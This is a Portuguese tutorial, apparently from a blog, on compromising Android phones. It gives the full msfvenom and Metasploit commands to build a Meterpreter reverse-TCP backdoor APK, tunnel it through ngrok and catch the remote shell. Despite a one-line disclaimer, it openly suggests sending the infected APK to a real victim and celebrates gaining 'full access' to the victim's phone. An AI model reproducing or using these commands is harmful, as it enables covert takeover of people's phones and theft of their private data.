Invadindo celular Android usando Msfvenom e Ngrok
O conteúdo que se apresenta nesse artigo e destinado aos profissionais e estudantes de Segurança da Informação. Não nos responsabilizamos pelo maus uso das técnicas apresentadas.
Olá, neste artigo estarei abordando a criação Backdoor com o msfvenom de uma simples shell reversa com Metasploit Framework e Meterpreter, onde iremos criar um .apk infectado que quando executado na máquina da vítima, cria uma conexão reversa com nossa máquina nos dando permissões de administrador ao seu celular
Irei utilizar o ngrok para fazer um túnel de conexão sem eu ter que abrir portas do roteador para me conectar fora da rede externa.
Bora começar
Primeiramente iremos abrir o ngrok ( caso você não tenha, leia meu artigo anterior: Usando Ngrok no kali linux que eu explico como realizar o download)
ngrok tcp 22
Iremos ter que Utilizar o nosso FORWARDING TCP como o LHOST e o 12643 como LPORT
Lembrando que cada um tem o seu FORWARDING
Vamos criar e encodar o payload com o msfvenom, Estaremos utilizando um payload de reverse_TCP.
Onde:
p : Iremos definir o Payload a ser utilizado
LHOST e LPORT : Iremos definir respectivamente o TCP do Ngrok e Porta do ngrok também que o alvo irá se conectar na nossa máquina após a infecção
R > : o caminho de onde queremos criar e o nome do APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=12643 R > /root/Documentos/medium.apk
Se a gente entrar na pasta Documentos iremos encontrar ele lá
Iniciando o Metasploit e Manipulando as sessões
Agora iremos abrir o msfconsole siga os comando
#msfconsole
msf > use exploit/multi/handler
msf >set PAYLOAD android/meterpreter/reverse_tcp
msf >set LHOST 127.0.0.1
msf >set LPORT 22
msf > exploit
Agora é só testar se tudo esta funcionando. Nesse caso irei realizar um emulador pra realizar a invasão, mas você pode realizar em um celular de uma vítima.
Utilizei meu Telegram para enviar o apk para o emulador Android, mas você pode utilizar outro métodos para enviar o apk para alguém
Iniciando a sessão com a vítima
Agora é só clicar em abrir
Conseguimos, tudo deu certo! Agora temos acesso total do celular da vitima.
irei
Agora é só você utilizar os comandos para explorar as informações da vítima.